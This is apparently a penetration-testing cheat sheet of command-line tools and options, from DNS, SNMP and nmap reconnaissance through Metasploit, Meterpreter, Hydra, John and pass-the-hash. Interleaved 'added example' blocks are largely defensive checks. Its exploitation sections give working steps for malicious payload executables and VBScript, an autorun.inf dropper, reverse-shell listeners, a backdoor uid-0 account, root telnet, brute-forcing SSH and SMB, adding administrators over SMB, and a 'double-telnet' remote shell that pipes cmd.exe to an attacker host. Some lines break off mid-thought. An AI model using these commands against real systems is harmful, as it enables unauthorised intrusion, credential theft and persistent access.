whois
$ whois [-h whois_server] name
nslookup
$ nslookup
dig
-
Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
$ dig [@server] <name> [type]
-
Zone transfer
$ dig [@server] <domain> -t AXFR
-
Incremental zone transfer (IXFR; the serial is the SOA serial you already hold, the server returns the changes since then)
$ dig [@server] <domain> -t IXFR=<serial>
BiLE.pl
$ ./BiLE.pl
$ ./BiLE-weigh.pl
$ ./tld-expand.pl
$ ./vet-IPrange.pl
$ ./qtrace.pl
snmpwalk
Dump the ARP table of an SNMP agent at <HOST> (read-only community <community> is enough)
$ snmpwalk -v 2c -c <community> <HOST> ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress > arptable.dump
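The dump above is only useful once it is turned into IP/MAC pairs. The following is an added example, not part of the original cheat sheet: a small awk parser for snmpwalk's ipNetToMediaPhysAddress output, run against constructed sample lines (no SNMP agent needed). It assumes the Net-SNMP text format, where the OID suffix is ifIndex followed by the four IP octets, and handles both the usual STRING form and the Hex-STRING form snmpwalk uses when the value contains non-printable bytes.

```shell
# Added example (not from the original page). Assumes Net-SNMP output such as:
#   IP-MIB::ipNetToMediaPhysAddress.2.10.10.10.1 = STRING: 0:c:29:3a:1b:5c
#   IP-MIB::ipNetToMediaPhysAddress.2.10.10.10.20 = Hex-STRING: 00 50 56 A1 B2 C3
parse_arp_dump() {
    # Split on runs of space, dot or '=': $1 object name, $2 ifIndex,
    # $3-$6 IP octets, $7 the type tag, $8.. the value.
    awk -F'[ .=]+' '/ipNetToMediaPhysAddress/ {
        ip = $3 "." $4 "." $5 "." $6
        if ($7 == "Hex-STRING:") {
            # Hex-STRING values are space-separated bytes; re-join with ":"
            mac = $8
            for (i = 9; i <= NF; i++) if ($i != "") mac = mac ":" $i
        } else {
            mac = $8
        }
        print ip, mac
    }' "$1"
}

make_arp_dump_sample() {
    # Constructed sample of what arptable.dump could contain; the
    # ipNetToMediaType line shows the filter ignoring other columns.
    f=$(mktemp)
    cat > "$f" <<'EOF'
IP-MIB::ipNetToMediaPhysAddress.2.10.10.10.1 = STRING: 0:c:29:3a:1b:5c
IP-MIB::ipNetToMediaPhysAddress.2.10.10.10.20 = Hex-STRING: 00 50 56 A1 B2 C3
IP-MIB::ipNetToMediaType.2.10.10.10.1 = INTEGER: dynamic(3)
EOF
    printf '%s\n' "$f"
}

# Usage: parse_arp_dump arptable.dump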
Scanning
tcpdump
Parameters
-
-n -- use numbers
-
-i <interface>
-
-v -- be verbose
-
-r <file>/-w <file> -- read from/write to file
-
-x -- print hex
-
-A -- print ASCII
-
-X -- print hex and ASCII
-
-s <snaplen> -- length to capture (-s0 for all data)
Filter string
-
Protocol
-
ether, ip, ip6, arp, rarp, tcp, udp
-
-
Type
-
host <host>
-
net <network>
-
port <portnum>
-
portrange <start-end>
-
-
Direction
-
src
-
dst
-
-
Logic
-
and
-
or
-
-
Show TCP against target 10.10.10.10 in ASCII
tcpdump [-i tap0] -n -A tcp and dst 10.10.10.10
-
Show all UDP from 10.10.10.10
tcpdump [-i tap0] -n udp and src 10.10.10.10
-
Show all TCP port 80 packets going to or from host 10.10.10.10
tcpdump [-i tap0] -n tcp and port 80 and host 10.10.10.10
hping3
TCP Flags
-
--syn, --fin, --rst, --push, --ack, --urg
Target selection
-
--rand-dest
-
--interface <int>
Source selection
-
--spoof <hostname>
-
--rand-source
Port selection
-
--destport <port>
-
--destport +<port> -- increment by one for each packet received
-
--destport ++<port> -- increment by one for each packet sent
-
--scan <portrange>
-
--baseport <port>
-
--keep -- don't increment the source port
Speed options
-
--fast, --faster, --flood
-
--interval <N> -- interval in seconds
-
--interval u<N> -- interval in microseconds
Other options
-
--count <N>
-
--beep
-
--file <filename>
-
--data <N>
traceroute
Parameters
-
-f <N> -- Initial TTL
-
-g <hostlist> -- Loose source route
-
-I -- use ICMP Echo instead of UDP
-
-m <N> -- maximum number of hops (default 30)
-
-n -- numeric
-
-p <baseport> -- set the base UDP port
-
-w <N> -- wait N seconds (default 5)
Layer Four Traceroute (lft)
Options
-
-u -- use UDP
-
-p -- use ICMP echo
-
-d <port> -- destination port (default 80)
-
-s <port> -- source port
-
-L <N> -- length (including layer 3/4 header)
-
-A -- look up AS number
-
-P -- traceroute via tcp
nmap
Pinging
-
-PN -- don't ping
-
-PB -- default, ICMP Echo + TCP to port 80
-
-PE -- ICMP Echo request
-
-PS[portlist] -- TCP SYN
-
-PP -- ICMP Timestamp request
-
-PM -- ICMP Address Mask request
-
-PR -- default on subnet, use ARP to identify hosts
Scanning
-
-sT -- TCP Connect scan
-
-sS -- SYN scan
-
-sA -- ACK scan
-
-sF -- FIN scan
-
-sN -- Null scan
-
-sX -- Xmas Tree scan
-
-sM -- Maimon scan
-
--scanflags <flags> -- specify your own flags
-
-sU -- UDP scan
Fingerprinting
-
-O -- OS fingerprint
-
-sV -- Version scan
Scripts
-
-sC -- run the default script category (not every script)
-
--script=<category,dir,script,etc>
-
--script-trace
Timing
-
-T paranoid|sneaky|polite|normal|aggressive|insane (equivalently -T0 .. -T5)
-
--host-timeout, --max-rtt-timeout, --min-rtt-timeout, --initial-rtt-timeout, --max-parallelism, --scan-delay
Other options
-
-p<ports>
-
-F -- fast (checks only ports in nmap-services)
-
--packet-trace
-
--traceroute
-
--badsum
THC amap
Options
-
-q -- quiet (omit closed ports)
-
-v -- verbose
-
-b -- print banners
Example:
amap -bqv 10.10.10.10 1-50
Enumerating users
Commands
$ cat /etc/passwd
$ finger
$ who
$ w
Remotely:
$ finger @<host>
$ finger <user>@<host>
Exploitation
netcat
Options
-
-l -- listen mode
-
-L -- listen harder (Windows only)
-
-u -- UDP mode
-
-p -- local port (in listen mode, the port to listen on)
-
-e -- program to execute
-
-n -- don't resolve names
-
-z -- don't send any data
-
-w<N> -- timeout for connects
-
-v/-vv -- be verbose
Scanning (a port range is written start-end; add -z to connect without sending data)
echo "" | nc -v -n -w1 <host> <startport>-<endport>
Setting up a relay
mknod backpipe p
nc -l -p <localport> 0<backpipe | nc <host> <port> 1>backpipe
Relaying port 22 to the local system
mknod backpipe p
nc -l -p <localport> 0<backpipe | nc localhost 22 1>backpipe
Finding SetUID/SetGID programs
find / -type f \( -perm -4000 -o -perm -2000 \) -print
find /bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
for i in `locate -r "bin$"`; do find $i -type f \( -perm -4000 -o -perm -2000 \) -print; done
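To check what the -perm filter above does and does not report before running it over a whole host, here is an added example (not from the original page) that builds a throwaway directory with one setuid file, one setgid file, one plain file and a setgid directory, and runs the same find expression over it. It assumes a POSIX find(1) and chmod(1) and that the temporary directory is on a filesystem that stores the setuid/setgid bits (nosuid mounts still store them, they just do not honour them).

```shell
# Added example (not from the original page).
find_privileged() {
    # Regular files with the setuid (4000) or setgid (2000) bit set.
    # "-perm -4000" means "at least these bits", so 4755 and 6755 both match.
    # GNU find also accepts the shorthand "-perm /6000" for the same test.
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

make_fixture() {
    # Constructed sample tree. The setgid *directory* must not be reported,
    # because the search is limited to regular files (-type f).
    d=$(mktemp -d)
    printf '' > "$d/suid_bin";  chmod 4755 "$d/suid_bin"
    printf '' > "$d/sgid_bin";  chmod 2755 "$d/sgid_bin"
    printf '' > "$d/plain_bin"; chmod 0755 "$d/plain_bin"
    mkdir "$d/sgid_dir";        chmod 2755 "$d/sgid_dir"
    printf '%s\n' "$d"
}

# Usage: find_privileged /    (or any directory; expect suid_bin and sgid_bin
# from the fixture, and nothing else)
```

Compare the list against the distribution's package manifest (e.g. the file list of the owning package) afterwards; an unexpected entry, or a known binary with a fresh modification time, is what a post-exploitation backdoor looks like.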
Metasploit
Note: msfpayload and msfcli, used below, were removed from Metasploit in 2015; the same jobs are now done by msfvenom (payload generation, including the VBScript and EXE outputs) and msfconsole -x (starting a handler from the command line).
Running an exploit
msf> show exploits
msf> use exploit/windows/smb/ms05_039_pnp
msf> show payloads
msf> set PAYLOAD windows/shell/bind_tcp
msf> show options
msf> set RHOST 10.10.10.10
msf> exploit
Interacting with sessions
msf> sessions -l
msf> sessions -i <id>
Creating a malicious VBScript
$ msfpayload windows/meterpreter/reverse_tcp LHOST=<ip> V
$ msfpayload windows/vncinject/reverse_tcp LHOST=<ip> DisableCourtesyShell=y V
Creating a malicious Exe
$ msfpayload windows/meterpreter/reverse_tcp LHOST=<ip> X
$ msfpayload windows/vncinject/reverse_tcp LHOST=<ip> DisableCourtesyShell=y X
Example autorun.inf file to run a malicious exe (goes with Metasploit)
[autorun]
open=example.exe
icon=example.exe
Metasploit listener
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=<ip> E
$ msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=<ip> DisableCourtesyShell=y E
Meterpreter
Filesystem commands
> cd
> lcd
> pwd / getwd
> ls
> cat
> download / upload
> mkdir / rmdir
> edit
> getpid
> getuid
> ps
> kill
> execute
> migrate
> ipconfig
> portfwd
> route
> idletime
> uictl
Modules
> use
> use priv
> hashdump
> timestomp
Creating a user
Adding an ordinary user
useradd <username>
Adding a second uid-0 user (note: remote logins as uid 0 are often refused, e.g. sshd's PermitRootLogin, so an ordinary account to log in with and then su to the uid-0 account may be needed)
useradd -o -u 0 <username>
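The defender's counterpart to "useradd -o -u 0" is a check for accounts that share uid 0. The following is an added example, not from the original page: an awk one-liner wrapped in a function, run against a constructed /etc/passwd excerpt so it can be tested offline. It assumes the standard seven-field colon-separated passwd format and a POSIX awk.

```shell
# Added example (not from the original page).
list_uid0() {
    # Print every account whose uid (3rd field) is 0, other than "root".
    # Any output is a finding: a second uid-0 account is a classic backdoor.
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

make_passwd_sample() {
    # Constructed /etc/passwd excerpt; "toor" is the duplicate-uid-0 account
    # that "useradd -o -u 0 toor" would have created.
    f=$(mktemp)
    cat > "$f" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
toor:x:0:0::/root:/bin/bash
george:x:1000:1000:George:/home/george:/bin/bash
EOF
    printf '%s\n' "$f"
}

# Usage: list_uid0 /etc/passwd      (prints "toor" for the sample above)
```

Run it against /etc/passwd on the real host; on a system that also uses NSS sources other than files (LDAP, NIS) check getent passwd output the same way.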
telnet
Checking for inetd/xinetd
ps aux | grep inetd
Adding telnet to /etc/inetd.conf
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
Adding telnet to xinetd
-
Copy the file of a service that is already running as a template (files are in /etc/xinetd.d)
-
Change server to "/usr/sbin/in.telnetd"
Restarting inetd/xinetd (the "kill" command with the PID can also be used)
killall -HUP inetd
killall -HUP xinetd
sshd
The init script lives under /etc/rc* or /etc/init.d. Ways to enable and start it:
chkconfig sshd on
service sshd start
/etc/init.d/sshd start
Passwords
Dictionaries
Creating a dictionary
sort -u wordlist.txt > dictionary.txt
Scraping a Web site
mkdir /tmp/source
cd /tmp/source
wget -r -l<depth> <url>
cd ..
grep -h -r "" source | tr '[:space:]' '\n' | grep -v '<' | sort | uniq > wordlist.lst
Or, just use
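The grep/tr pipeline above has a blind spot: "grep -v '<'" throws away every token that is glued to an HTML tag, so a word that only ever appears right after a tag (typically the site or product name in headings and links) never reaches the wordlist. The following is an added example, not from the original page: the page's pipeline and a tag-stripping variant, both run against a constructed HTML file standing in for a wget mirror. It assumes GNU or BSD grep, sed, tr and sort with the options shown.

```shell
# Added example (not from the original page).
make_page() {
    # Constructed stand-in for one page of a mirrored site under /tmp/source.
    d=$(mktemp -d)
    cat > "$d/index.html" <<'EOF'
<html><head><title>Acme Widgets</title></head>
<body><h1>Welcome to Acme</h1>
<p>Acme Widgets ships the best widgets since 1999.</p>
<a href="/about.html">About Acme</a></body></html>
EOF
    printf '%s\n' "$d"
}

build_wordlist() {
    # The page's pipeline: split on whitespace, drop tokens containing '<',
    # de-duplicate. "Acme" only ever appears glued to a tag, so it is lost.
    grep -h -r "" "$1" | tr '[:space:]' '\n' | grep -v '<' | sort | uniq
}

build_wordlist_stripped() {
    # Variant: remove tags first, then keep runs of alphanumerics only, so
    # "<h1>Welcome" yields "Welcome" and "1999." yields "1999".
    grep -h -r "" "$1" | sed 's/<[^>]*>/ /g' | tr -cs '[:alnum:]' '\n' \
        | grep -v '^$' | sort -u
}

# Usage: build_wordlist_stripped /tmp/source > wordlist.lst
```

Both variants are case-sensitive ("Widgets" and "widgets" are separate entries), which is what you want as input to a rule-based cracker; fold case afterwards if the target's policy is case-insensitive.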
Account lockout
grep tally /etc/pam.d/*
grep tally /etc/pam.conf
pw-inspector
Options
-
-i -- input file
-
-o -- output file
-
-m <N> -- minimum length
-
-M <N> -- maximum length
-
-c <N> -- the number of criteria
-
-l -- lower case
-
-u -- upper case
-
-n -- numbers
-
-p -- printable characters (lower/upper/num)
-
-s -- special characters (all others)
-
Example
cat /tmp/password.list | pw-inspector -m 6 -n -u -l -c 2
Hydra
Options
-
-l <username>/-L <userfile> -- Login name/file
-
-p <password>/-P <passfile> -- Password/file
-
-e <n|s|ns> -- extended checks (n = null, s = same as username)
-
-t <N> -- thread count
hydra <-l user | -L userfile> <-p password | -P passfile> [-e ns] [-t N] <host> <service>
smb password
hydra <host> smb -l george -P ./list.lst -e ns
ssh password
hydra <host> ssh -l george -P ./list.lst -e ns
John
Show cracked passwords
john --show
Speed test
john --test
Running against a password file
john <passwordfile>
Specifying the hash format
john --format=<format> <passwordfile>
john --format=nt /tmp/pwdump
Combining passwd/shadow
unshadow <passwdfile> <shadowfile> > combined.txt
john combined.txt
Modified Samba (pass-the-hash build: the LM:NT hash pair is read from the environment instead of a password)
Loading the hash
export SMBHASH="<LM hash>:<NT hash>"
echo $SMBHASH
Mounting a drive
./smbmount //<host>/<share> <mountpoint> -o username=<user>
./smbmount //10.10.10.10/c$ /mnt/target -o username=administrator
Adding a user
./net user ADD <user> <password> -I <host> -U <adminuser>
./net rpc group ADDMEM administrators <user> -I <host> -U <adminuser>
Web
nikto.pl
Scanning
nikto.pl -h <host>
Updating
nikto.pl -update
Single check
nikto.pl -Single
Fancy tricks
Double-telnet
On the attacker machine
nc -l -p 4444
nc -l -p 5555
On the victim machine
telnet <attacker> 4444 | cmd.exe | telnet <attacker> 5555